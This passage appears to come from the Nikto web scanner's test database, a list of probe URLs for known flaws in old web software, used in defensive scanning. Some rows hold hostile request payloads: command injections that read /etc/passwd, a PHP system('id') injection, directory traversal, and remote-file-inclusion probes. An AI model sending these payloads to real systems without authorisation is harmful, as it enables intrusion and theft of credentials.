####################################################################### # File Source: https://cirt.net # (c) 2001 Chris Sullo, All Rights Reserved. # This file may only be distributed and used with the full Nikto package. # This file may not be used with any software product without written permission from # Chris Sullo (csullo@gmail.com) # # Note: # By submitting updates to this file you are transferring any and all copyright # interest in the data to Chris Sullo so it can modified, incorporated into this product # relicensed or reused. ####################################################################### # Notes: # # Tuning options (field 3): # 0 - File Upload # 1 - Interesting File / Seen in logs # 2 - Misconfiguration / Default File # 3 - Information Disclosure # 4 - Injection (XSS/Script/HTML) # 5 - Remote File Retrieval - Inside Web Root # 6 - Denial of Service # 7 - Remote File Retrieval - Server Wide # 8 - Command Execution / Remote Shell # 9 - SQL Injection # a - Authentication Bypass # b - Software Identification # c - Remote source inclusion # d - WebService # e - Administrative Console # f - XML Injection # # Field order: # Test-ID, References, Tuning Type, URI, HTTP Method, Match 1, Match 1 Or, Match 1 And, Fail 1, Fail 2, Summary, HTTP Data, Headers # ####################################################################### "000001","","b","/TiVoConnect?Command=QueryServer","GET","Calypso Server","","","","","The Tivo Calypso server is running. This page will display the version and platform it is running on. Other URLs may allow download of media.","","" "000002","","b","/TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes","GET","TiVoContainer","","","","","TiVo client service is running and may allow download of mp3 or jpg files.","","" "000003","","1234576890ab","@CGIDIRScart32.exe","GET","200","","","","","request cart32.exe/cart32clientlist","","" "000004","http://phrack.org/issues/55/7.html#article","1234576890ab","@CGIDIRSclassified.cgi","GET","200","","","","","Check Phrack 55 for info by RFP","","" "000005","http://phrack.org/issues/55/7.html#article","1234576890ab","@CGIDIRSdownload.cgi","GET","200","","","","","Check info in Phrack 55 by RFP","","" "000006","http://phrack.org/issues/55/7.html#article","1234576890ab","@CGIDIRSflexform.cgi","GET","200","","","","","Check Phrack 55 for info by RFP; allows to append info to writable files.","","" "000007","http://phrack.org/issues/55/7.html#article","1234576890ab","@CGIDIRSflexform","GET","200","","","","","Check Phrack 55 for info by RFP; allows to append info to writable files.","","" "000008","http://phrack.org/issues/55/7.html#article","1234576890ab","@CGIDIRSlwgate.cgi","GET","200","","","","","Check Phrack 55 for info by RFP","","" "000009","http://phrack.org/issues/55/7.html#article","1234576890ab","@CGIDIRSLWGate.cgi","GET","200","","","","","Check Phrack 55 for info by RFP.","","" "000010","http://phrack.org/issues/55/7.html#article","1234576890ab","@CGIDIRSlwgate","GET","200","","","","","Check Phrack 55 for info by RFP","","" "000011","http://phrack.org/issues/55/7.html#article","1234576890ab","@CGIDIRSLWGate","GET","200","","","","","Check Phrack 55 for info by RFP","","" "000012","http://phrack.org/issues/55/7.html#article","1234576890ab","@CGIDIRSperlshop.cgi","GET","200","","","","","v3.1 by ARPAnet.com; check info in Phrack 55 by RFP","","" "000013","http://attrition.org/security/advisory/individual/rfp/rfp.9901.nt_odbc","1234576890ab","/cfappman/index.cfm","GET","200","","not found","","","sSsceptible to ODBC/pipe-style exploit.","","" "000014","http://attrition.org/security/advisory/individual/rfp/rfp.9901.nt_odbc","1234576890ab","/cfdocs/examples/cvbeans/beaninfo.cfm","GET","200","","not found","","","Susceptible to ODBC exploit.","","" "000015","http://attrition.org/security/advisory/individual/rfp/rfp.9901.nt_odbc","1234576890ab","/cfdocs/examples/parks/detail.cfm","GET","200","","not found","","","Susceptible to ODBC exploit.","","" "000016","","1234576890ab","/kboard/","GET","200","","","","","KBoard Forum 0.3.0 and prior have a security problem in forum_edit_post.php, forum_post.php and forum_reply.php","","" "000017","","1234576890ab","/lists/admin/","GET","200","","","","","PHPList pre 2.6.4 contains a number of vulnerabilities including remote administrative access, harvesting user info and more. Default login to admin interface is admin/phplist","","" "000018","https://seclists.org/bugtraq/2002/Jul/262","7a","/splashAdmin.php","GET","200","","","","","Cobalt Qube 3 admin is running. This may have multiple security problems which could not be tested remotely.","","" "000019","","1234576890ab","/ssdefs/","GET","200","","","","","Siteseed pre 1.4.2 has 'major' security problems.","","" "000020","","1234576890ab","/sshome/","GET","200","","","","","Siteseed pre 1.4.2 has 'major' security problems.","","" "000021","","1234576890ab","/tiki/","GET","200","","","","","Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin","","" "000022","","1234576890ab","/tiki/tiki-install.php","GET","200","","","","","Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin","","" "000023","http://attrition.org/security/advisory/individual/rfp/rfp.9901.nt_odbc","1234576890ab","/scripts/samples/details.idc","GET","200","","","","","NT ODBC Remote Compromise.","","" "000024","CVE-2000-0709","6","/_vti_bin/shtml.exe","GET","200","","","","","Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.","","" "000025","","1","@CGIDIRShandler.cgi","GET","200","","","","","Variation of Irix Handler? Has been seen from other CGI scanners.","","" "000026","","28","@CGIDIRSfinger","GET","200","","","","","finger other users, may be other commands?","","" "000027","","28","@CGIDIRSfinger.pl","GET","200","","","","","finger other users, may be other commands?","","" "000028","","3","@CGIDIRSformmail.cgi","GET","Matt\sWright","","","","","The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.","","" "000030","","3","@CGIDIRSformmail","GET","Matt\sWright","","","","","The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.","","" "000031","","3","@CGIDIRSget32.exe","GET","200","","","","","This can allow attackers to execute arbitrary commands remotely.","","" "000032","CVE-2002-0324 http://www.attrition.org/~jericho/works/security/greymatter.html","3","@CGIDIRSgm-authors.cgi","GET","200","","","","","GreyMatter 'password' file, that controls who can post. This contains login and password information and is installed mode 666 by default.","","" "000033","","3","@CGIDIRSguestbook/passwd","GET","200","","","","","GuestBook r4 from lasource.r2.ru stores the admin password in a plain text file.","","" "000034","https://www.php.net/manual/en/function.phpinfo.php","3","@CGIDIRShorde/test.php?mode=phpinfo","GET","PHP Version","","","","","Horde allows phpinfo() to be run, which gives detailed system information.","","" "000035","","3","@CGIDIRSphoto/protected/manage.cgi","GET","200","","","","","My Photo Gallery management interface. May allow full access to photo galleries and more. Versions before 3.8 allowed anyone to view contents of any directory on systems.","","" "000036","","3","@CGIDIRSwrap.cgi","GET","200","","","","","Allows viewing of directories.","","" "000037","","3","/./","GET","include\(\"","","","","","Appending '/./' to a directory may reveal PHP source code.","","" "000038","CVE-2001-1013","23","/~root/","GET","200","","","rtsptext","","Allowed to browse root's home directory.","","" "000039","","3","/cgi-bin/wrap","GET","200","","","","","Allows viewing of directories.","","" "000040","","3","/forums/@ADMINconfig.php","GET","200","","","","","PHP Config file may contain database IDs and passwords.","","" "000041","","3","/forums/config.php","GET","200","","","","","PHP Config file may contain database IDs and passwords.","","" "000042","","3","/ganglia/","GET","Cluster","","","","","Ganglia Cluster reports reveal detailed information.","","" "000043","","3","/guestbook/guestbookdat","GET","200","","","","","PHP-Gastebuch 1.60 Beta reveals sensitive information about its configuration.","","" "000044","","3","/guestbook/pwd","GET","200","","","","","PHP-Gastebuch 1.60 Beta reveals the md5 hash of the admin password.","","" "000045","","3","/help/","GET","200","","","","","Help directory should not be accessible","","" "000046","https://vulners.com/exploitdb/EDB-ID:23027","3","/hola/admin/cms/htmltags.php?datei=./sec/data.php","GET","200","","","","","hola-cms-1.2.9-10 may reveal the administrator ID and password.","","" "000047","","3","/horde/imp/test.php","GET","Horde Versions","","","","","Horde script reveals detailed system/Horde information.","","" "000048","https://www.php.net/manual/en/function.phpinfo.php","3","/horde/test.php?mode=phpinfo","GET","PHP Version","","","","","Horde allows phpinfo() to be run, which gives detailed system information.","","" "000049","https://www.php.net/manual/en/function.phpinfo.php","3","/imp/horde/test.php?mode=phpinfo","GET","PHP Version","","","","","Horde allows phpinfo() to be run, which gives detailed system information.","","" "000050","","3","/imp/horde/test.php","GET","Horde Versions","","","","","Horde script reveals detailed system/Horde information.","","" "000051","","3","/index.html.bak","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","The remote server (perhaps Web602) shows directory indexes if .bak is appended to the request.","","" "000052","","3","/index.html~","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","The remote server (perhaps Web602) shows directory indexes if a ~ is appended to the request.","","" "000053","CVE-2001-1168","7","/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc","GET","resolv\.conf","","","","","phpMyExplorer allows attackers to read directories on the server.","","" "000054","CVE-2002-0614","23","/global.inc","GET","200","","","","","PHP-Survey's include file should not be available via the web. Configure the web server to ignore .inc files or change this to global.inc.php","","" "000055","","3b","@CGIDIRSformmail.pl","GET","Matt\sWright","","","","","Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.","","" "000056","","3b","@CGIDIRShorde/test.php","GET","Horde Versions","","","","","Horde script reveals detailed system/Horde information.","","" "000057","CVE-2003-1253","4","/inc/common.load.php","GET","200","","","","","Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.","","" "000058","CVE-2003-1253","4","/inc/config.php","GET","200","","","","","Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.","","" "000059","CVE-2003-1253","4","/inc/dbase.php","GET","200","","","","","Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.","","" "000060","","6","@CGIDIRSvisadmin.exe","GET","200","","","","","This CGI allows an attacker to crash the web server. Remove it from the CGI directory.","","" "000061","","7","@CGIDIRShtml2chtml.cgi","GET","200","","","","","Html2Wml < 0.4.8 access local files via CGI, and more","","" "000062","","7","@CGIDIRShtml2wml.cgi","GET","200","","","","","Html2Wml < 0.4.8 access local files via CGI, and more","","" "000063","CVE-2000-0590","7","@CGIDIRSpollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00","GET","root:","","","","","Poll_It_SSI_v2.0.cgi allows attackers to retrieve arbitrary files.","","" "000064","","8","@CGIDIRSecho.bat?&dir+c:\\","GET","200","","","","","This batch file may allow attackers to execute remote commands.","","" "000065","","8","@CGIDIRSexcite;IFS=\"$\";/bin/cat%20/etc/passwd","GET","root:","","200","","","Excite software is vulnerable to command execution.","","" "000066","CVE-2000-0187","8","@CGIDIRSezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|","GET","root:","","","","","EZShopper loadpage CGI command execution","","" "000067","","8","@CGIDIRSguestbook.cgi","GET","200","","","","","May allow attackers to execute commands as the web daemon.","","" "000068","","8","@CGIDIRSguestbook.pl","GET","200","","","","","May allow attackers to execute commands as the web daemon.","","" "000069","","8","@CGIDIRSss","GET","200","","","","","Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.","","" "000070","CVE-2005-0429","8","/forumdisplay.php?GLOBALS\[\]=1&f=2&comma=\".system\('id'\)\.\"","GET","uid=0","","","","","VBulletin forumdisplay.php remote command execution.","","" "000071","https://vulners.com/osvdb/OSVDB:2889","8","/guestbook/guestbook.html","GET","Jason Maloney","","","","","Jason Maloney CGI Guestbook 3.0 allows remote code execution. Bugtraq 2003-12-01","","" "000072","","8","/html/cgi-bin/cgicso?query=AAA","GET","400 Required field missing: fingerhost","","","","","This CGI allows attackers to execute remote commands.","","" "000073","https://vulners.com/osvdb/OSVDB:2703","9","/geeklog/users.php","GET","200","","","","","Geeklog prior to 1.3.8-1sr2 contains a SQL injection vulnerability that lets a remote attacker reset admin password.","","" "000074","CVE-2002-1560","a","/gb/index.php?login=true","GET","200","","","","","gBook may allow admin login by setting the value 'login' equal to 'true'.","","" "000075","","a","/guestbook/admin.php","GET","200","","","","","Guestbook admin page available without authentication.","","" "000076","","b","@CGIDIRSgH.cgi","GET","200","","","","","Web backdoor by gH","","" "000077","CVE-2002-0324 http://www.attrition.org/~jericho/works/security/greymatter.html","b","@CGIDIRSgm-cplog.cgi","GET","200","","","","","GreyMatter log file defaults to mode 666 and contains login and passwords used to update the GM site.","","" "000078","","b","/getaccess","GET","200","","","","","This may be an indication that the server is running getAccess for SSO","","" "000079","https://www.darknet.org.uk/2007/01/spike-proxy-application-level-security-assessment/","b","/help.html","GET","little interface into SPIKE","","","","","SPIKE Proxy may be running; try using it as a proxy.","","" "000080","CVE-2002-0324 http://www.attrition.org/~jericho/works/security/greymatter.html","3b","@CGIDIRSgm.cgi","GET","200","","","","","GreyMatter blogger may reveal user IDs/passwords through a gmrightclick-######.reg files (# are numbers), possibly in /archive or other archive location.","","" "000081","CVE-2002-0451,https://securiteam.com/unixfocus/5PP0F1P6KS/","c","/filemanager/filemanager_forms.php?lib_path=@RFIURL","GET","PHP Version","","","","","Some versions of PHProjekt allow remote file inclusions.","","" "000082","","1e","@CGIDIRSAT-admin.cgi","GET","200","","","","","Admin interface.","","" "000083","CVE-2001-0821 https://packetstormsecurity.com/files/32406/xmas.txt.html","23","@CGIDIRSauth_data/auth_user_file.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely.","","" "000084","","23","@CGIDIRSawstats.pl","GET","Traffic","","","","","AWStats logfile analyzer.","","" "000085","","23","@CGIDIRSawstats/awstats.pl","GET","Traffic","","","","","Free realtime logfile analyzer for advanced web statistics. Should be protected.","","" "000086","","23b","@CGIDIRSblog/mt.cfg","GET","configuration file","","","","","Movable Type configuration file found. Should not be available remotely.","","" "000087","CVE-2003-1517","3","@CGIDIRScart.pl?db='","GET","c:\\\\","","","","","Dansie Shopping Cart reveals the full path to the CGI directory.","","" "000088","CVE-2003-1517","3","@CGIDIRScart.pl?db='","GET","d:\\\\","","","","","Dansie Shopping Cart reveals the full path to the CGI directory.","","" "000089","CVE-2000-1191","3","@CGIDIRShtsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=","GET","ht:\\\/\\\/Dig","","","","","The ht://Dig install may reveal the path to its configuration files, revealing sensitive information about the server.","","" "000090","","3","@CGIDIRSmt-static/mt-check.cgi","GET","200","","","","","Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.","","" "000091","","3","@CGIDIRSmt/mt-check.cgi","GET","200","","","","","Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.","","" "000092","","3","/cfdocs/expeval/openfile.cfm","GET","200","","","","","Can use to expose the system/server path.","","" "000093","","3","/index.php/123","GET","Premature end of script headers","","","","","Some versions of PHP reveal PHP's physical path on the server by appending /123 to the PHP file name.","","" "000094","https://vulners.com/osvdb/OSVDB:7510","3","/mambo/index.php?Itemid=JUNK(5)","GET","exceeded in \/","","","","","Mambo Site Server 4.0.11 reveals the web server path.","","" "000095","CVE-2002-1723","3","/profile.php?u=JUNK(8)","GET","Warning:","","","","","Powerboards is vulnerable to path disclosure.","","" "000096","CVE-2002-2158","3","/ticket.php?id=99999","GET","expects first argument","","","","","ZenTrack versions v2.0.3, v2.0.2beta and older reveal the web root with certain errors.","","" "000097","CVE-2003-0400","3","/vgn/login/1,501,,00.html?cookieName=x--\>","GET","value=\"x--","","","","","Vignette server may leak memory with an invalid request. Upgrade to the latest version.","","" "000098","","3","/a%5c.aspx","GET","Invalid file name for monitoring:","","","","","Older Microsoft .NET installations allow full path disclosure.","","" "000099","","7","@CGIDIRSbanner.cgi","GET","200","","","","","This CGI may allow attackers to read any file on the system.","","" "000100","","7","@CGIDIRSbannereditor.cgi","GET","200","","","","","This CGI may allow attackers to read any file on the system.","","" "000101","CVE-2001-1114","7","@CGIDIRSbook.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the server.","","" "000102","","7e","/admin/browse.asp?FilePath=c:\&Opt=2&level=0","GET","winnt","","","","","Hosting Controller from hostingcontroller.com allows any file on the system to be read remotely.","","" "000103","","8","@CGIDIRSarchitext_query.pl","GET","200","","","","","Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.","","" "000104","CVE-2000-0287","8","@CGIDIRSbizdb1-search.cgi","GET","200","","","","","This CGI may allow attackers to execute commands remotely.","","" "000105","","b","@CGIDIRSblog/","GET","200","","","","","A blog was found. May contain security problems in CGIs, weak passwords, and more.","","" "000106","https://web.archive.org/web/20040910030506/http://www.dslwebserver.com/main/fr_index.html?/main/sbs-Terminal-Services-Advanced-Client-Configuration.html","b","/tsweb/","GET","200","","","","","Microsoft TSAC found.","","" "000107","","1b","@CGIDIRSblog/mt-load.cgi","GET","200","","","","","Movable Type weblog installation CGI found. May be able to reconfigure or reload.","","" "000108","CVE-2002-1435","c","@CGIDIRSatk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL","GET","PHP Version","","","","","Achievo can be made to include PHP files from another domain. Upgrade to a new version.","","" "000109","","23e","/vgn/performance/TMT","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000110","","23e","/vgn/performance/TMT/Report","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000111","","23e","/vgn/performance/TMT/Report/XML","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000112","","23e","/vgn/performance/TMT/reset","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000113","","23e","/vgn/ppstats","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000114","","23e","/vgn/previewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000115","","23e","/vgn/record/previewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000116","","23e","/vgn/stylepreviewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000117","","23e","/vgn/vr/Deleting","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000118","","23e","/vgn/vr/Editing","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000119","","23e","/vgn/vr/Saving","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000120","","23e","/vgn/vr/Select","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000121","MS02-028","23","/scripts/iisadmin/bdir.htr","GET","200","","","","","This default script shows host info, may allow file browsing and buffer a overrun in the Chunked Encoding data transfer mechanism, request /scripts/iisadmin/bdir.htr??c:\.","","" "000122","","2a","/scripts/iisadmin/ism.dll","GET","200","","","","","Allows you to mount a brute force attack on passwords","","" "000123","","2a","/scripts/tools/ctss.idc","GET","200","","","","","This CGI allows remote users to view and modify SQL DB contents, server paths, docroot and more.","","" "000124","","3","/bigconf.cgi","GET","200","","","","","BigIP Configuration CGI","","" "000125","","3","/billing/billing.apw","GET","PASS BOX CAPTION:","","","","","CoffeeCup password wizard allows password files to be read remotely.","","" "000126","","3","/blah_badfile.shtml","GET","200","","","","","Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call.","","" "000127","","3","/blah-whatever-badfile.jsp","GET","Script \/","","","","","The web server is configured to respond with the web server path when requesting a non-existent .jsp file.","","" "000128","CVE-2003-0401","3","/vgn/style","GET","200","","","","","Vignette server may reveal system information through this file.","","" "000129","","3","/scripts/no-such-file.pl","GET","perl script","","","","","Using perl.exe allows attackers to view host info. Use perlis.dll instead.","","" "000130","CVE-2002-1769","3","/SiteServer/Admin/commerce/foundation/domain.asp","GET","200","","","","","Displays known domains of which that server is involved.","","" "000131","CVE-2002-1769","3","/SiteServer/Admin/commerce/foundation/driver.asp","GET","200","","","","","Displays a list of installed ODBC drivers.","","" "000132","CVE-2002-1769","3","/SiteServer/Admin/commerce/foundation/DSN.asp","GET","200","","","","","Displays all DSNs configured for selected ODBC drivers.","","" "000133","CVE-2002-1769","3","/SiteServer/admin/findvserver.asp","GET","200","","","","","Gives a list of installed Site Server components.","","" "000134","","3","/SiteServer/Admin/knowledge/dsmgr/default.asp","GET","200","","","","","Used to view current search catalog configurations","","" "000135","CVE-2001-0987","4","@CGIDIRScgiwrap/%3Cfont%20color=red%3E","GET","","","","","","cgiwrap allows HTML and possibly XSS injection.","","" "000136","http://moinmo.in/MoinMoinDownload","4","@CGIDIRSmoin.cgi?test","GET","200","","","","","MoinMoin 1.1 and prior contain at least two XSS vulnerabilities. Version 1.0 and prior also contains a XSLT related vulnerability","","" "000138","","4","/basilix/mbox-list.php3","GET","200","","","","","BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'message list' function/page","","" "000139","","4","/basilix/message-read.php3","GET","200","","","","","BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'read message' function/page","","" "000140","","4","/clusterframe.jsp","GET","200","","","","","Macromedia JRun 4 build 61650 remote administration interface is vulnerable to several XSS attacks.","","" "000141","","4","/IlohaMail/blank.html","GET","200","","","","","IlohaMail 0.8.10 contains a XSS vulnerability. Previous versions contain other non-descript vulnerabilities.","","" "000142","","8","/bb-dnbd/faxsurvey","GET","200","","","","","This may allow arbitrary command execution.","","" "000143","","8","/cartcart.cgi","GET","200","","","","","If this is Dansie Shopping Cart 3.0.8 or earlier, it contains a backdoor to allow attackers to execute arbitrary commands.","","" "000144","CVE-2001-0614","8","/scripts/Carello/Carello.dll","GET","200","","","","","Carello 1.3 may allow commands to be executed on the server by replacing hidden form elements. This could not be tested by Nikto.","","" "000145","","a","/scripts/tools/dsnform.exe","GET","200","","","","","Allows creation of ODBC Data Source","","" "000146","","a","/scripts/tools/dsnform","GET","200","","","","","Allows creation of ODBC Data Source","","" "000147","https://securitytracker.com/id/1003420","a","/SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp","GET","200","","","","","Microsoft Site Server script used to create, modify, and potentially delete LDAP users and groups.","","" "000148","https://securitytracker.com/id/1003420","a","/SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp","GET","200","","","","","Microsoft Site Server used to create, modify, and potentially delete LDAP users and groups.","","" "000149","","b","/prd.i/pgen/","GET","200","","","","","Has MS Merchant Server 1.0","","" "000150","","b","/readme.eml","GET","200","","","","","Remote server may be infected with the Nimda virus.","","" "000151","","b","/scripts/httpodbc.dll","GET","200","","","","","Possible IIS backdoor found.","","" "000152","","b","/scripts/proxy/w3proxy.dll","GET","502","","","","","MSProxy v1.0 installed","","" "000153","","b","/scripts/root.exe?/c+dir+c:\+/OG","GET","Directory of c","","","","","This machine is infected with Code Red, or has Code Red leftovers.","","" "000155","","1","/siteseed/","GET","200","","","","","Siteseed pre 1.4.2 have 'major' security problems.","","" "000156","MS01-033","2","/scripts/samples/search/author.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file that should be removed.","","" "000157","MS01-033","2","/scripts/samples/search/filesize.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file that should be removed.","","" "000158","MS01-033","2","/scripts/samples/search/filetime.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file that should be removed.","","" "000159","MS01-033","2","/scripts/samples/search/queryhit.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file that should be removed.","","" "000160","MS01-033","2","/scripts/samples/search/simple.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file that should be removed.","","" "000161","","23","/pccsmysqladm/incs/dbconnect.inc","GET","200","","","","","This file should not be accessible, as it contains database connectivity information. Upgrade to version 1.2.5 or higher.","","" "000162","","23e","/iisadmin/","GET","200","","","is restricted to Localhost","","Access to /iisadmin should be restricted to localhost or allowed hosts only.","","" "000163","","3","/password.inc","GET","globalpw","","","","","GTCatalog 0.9 admin password was retrieved remotely.","","" "000164","http://zodi.com/cgi-bin/shopper.cgi?display=intro&template=Intro/commerce.html","3","/PDG_Cart/order.log","GET","200","","","","","PDG Commerce log found.","","" "000165","","3","/web-console/ServerInfo.jsp%00","GET","<\%=","","","","","JBoss 3.2.1 with jetty seems to disclose source code.","","" "000166","","3","/global.asa","GET","RUNAT","","","","","The global.asa file was retrieved, which may contain sensitive information. Map the .asa extension to the proper dll.","","" "000167","","23","/exchange/lib/AMPROPS.INC","GET","Logon functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000168","","23","/exchange/lib/DELETE.INC","GET","deleting objects","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000169","","23","/exchange/lib/GETREND.INC","GET","GetRenderer functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000170","","23","/exchange/lib/GETWHEN.INC","GET","functions to construct","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000171","","23","/exchange/lib/JSATTACH.INC","GET","Attachment Javascript","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000172","","23","/exchange/lib/JSROOT.INC","GET","Javascript Functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000173","","23","/exchange/lib/JSUTIL.INC","GET","Common Javascript","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000174","","23","/exchange/lib/LANG.INC","GET","localized strings","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000175","","23","/exchange/lib/logon.inc","GET","Logon functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000176","","23","/exchange/lib/PAGEUTIL.INC","GET","functions that help","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000177","","23","/exchange/lib/PUBFLD.INC","GET","Anonymous Published","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000178","","23","/exchange/lib/RENDER.INC","GET","Rendering functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000179","","23","/exchange/lib/SESSION.INC","GET","Session Management","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000180","","5","/ows/restricted%2eshow","GET","200","","","","","OWS may allow restricted files to be viewed by replacing a character with its encoded equivalent.","","" "000181","http://www.westpoint.ltd.uk/advisories/wp-02-0002.txt","5","/WEB-INF./web.xml","GET","j2ee","","","","","Multiple implementations of j2ee servlet containers allow files to be retrieved from WEB-INF by appending a '.' to the directory name. Products include Sybase EA Service, Oracle Containers, Orion, JRun, HPAS, Pramati and others.","","" "000182","","7","/view_source.jsp","GET","200","License Exception","","","","Resin 2.1.2 view_source.jsp allows any file on the system to be viewed by using \..\ directory traversal. This script may be vulnerable.","","" "000183","","8","/w-agora/","GET","200","","","","","w-agora pre 4.1.4 may allow a remote user to execute arbitrary PHP scripts via URL includes in include/*.php and user/*.php files. Default account is 'admin' but password set during install.","","" "000184","CVE-2002-2320","a","/vider.php3","GET","200","","","","","MySimpleNews may allow deleting of news items without authentication.","","" "000185","","a","/exchange/root.asp?acs=anon","GET","\/exchange\/logonfrm\.asp","","","","","This allows anonymous access to portions of the OWA server.","","" "000186","https://web.archive.org/web/20030607054822/http://support.microsoft.com/support/exchange/content/whitepapers/owaguide.doc","a","/officescan/cgi/cgiChkMasterPwd.exe","GET","200","","","","","Trend Micro Officescan allows you to skip the login page and access some CGI programs directly.","","" "000187","https://www.f-secure.com/v-descs/tanatos.shtml","b","/%NETHOOD%/","GET","Microsoft Windows Network","","","","","The machine may be infected with the Bugbear.B virus.","","" "000188","BID-4684","d","@CGIDIRSastrocam.cgi","GET","200","","","","","Astrocam 1.4.1 contained buffer overflow. Prior to 2.1.3 contained unspecified security bugs.","","" "000189","","de","@CGIDIRSbadmin.cgi","GET","200","","","","","BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgraded.","","" "000190","CVE-2002-0098","de","@CGIDIRSboozt/admin/index.cgi?section=5&input=1","GET","200","","","","","Boozt CGI may have a buffer overflow. Upgrade to a version newer than 0.9.8alpha.","","" "000191","","de","@CGIDIRSezadmin.cgi","GET","200","","","","","Some versions of this CGI are vulnerable to a buffer overflow.","","" "000192","","d","@CGIDIRSezboard.cgi","GET","200","","","","","Some versions of this CGI are vulnerable to a buffer overflow.","","" "000193","","d","@CGIDIRSezman.cgi","GET","200","","","","","Some versions of this CGI are vulnerable to a buffer overflow.","","" "000194","CVE-2003-0762","d","@CGIDIRSfoxweb.dll","GET","200","","","","","Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.","","" "000195","CVE-2003-0762","d","@CGIDIRSfoxweb.exe","GET","200","","","","","Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.","","" "000196","","d","@CGIDIRSmgrqcgi","GET","200","","","","","This CGI from Magic Enterprise 8.30-5 and earlier is vulnerable to multiple buffer overflows. Upgrade to 9.x.","","" "000197","","d","@CGIDIRSwconsole.dll","GET","200","","","","","It may be possible to overflow this dll with 1024 bytes of data.","","" "000198","","d","@CGIDIRSwebplus.exe?about","GET","Product Information","","","","","Webplus may divulge product information, including version numbers. Version 4.X and below have a file read vulnerability. Versions prior to 4.6 build 561 and 5.0 build 554 have a buffer overflow.","","" "000199","MS00-094","d","/pbserver/pbserver.dll","GET","200","","","","","This may contain a buffer overflow.","","" "000200","","0","/administrator/gallery/uploadimage.php","GET","200","","","","","Mambo PHP Portal/Server 4.0.12 BETA and below may allow upload of any file type simply putting '.jpg' before the real file extension.","","" "000201","","0","/pafiledb/includes/team/file.php","GET","200","","","","","paFileDB 3.1 and below may allow file upload without authentication.","","" "000202","","0","/phpEventCalendar/file_upload.php","GET","200","","","","","phpEventCalendar 1.1 and prior are vulnerable to file upload bug.","","" "000203","","0","/servlet/com.unify.servletexec.UploadServlet","GET","200","Error Occurred","","","","This servlet allows attackers to upload files to the server.","","" "000204","","0","@CGIDIRSuploader.exe","GET","200","","","","","This CGI allows attackers to upload files to the server and then execute them.","","" "000205","","0","/scripts/cpshost.dll","GET","200","","","","","Posting acceptor possibly allows you to upload files","","" "000206","","0","/scripts/repost.asp","GET","Here is your upload 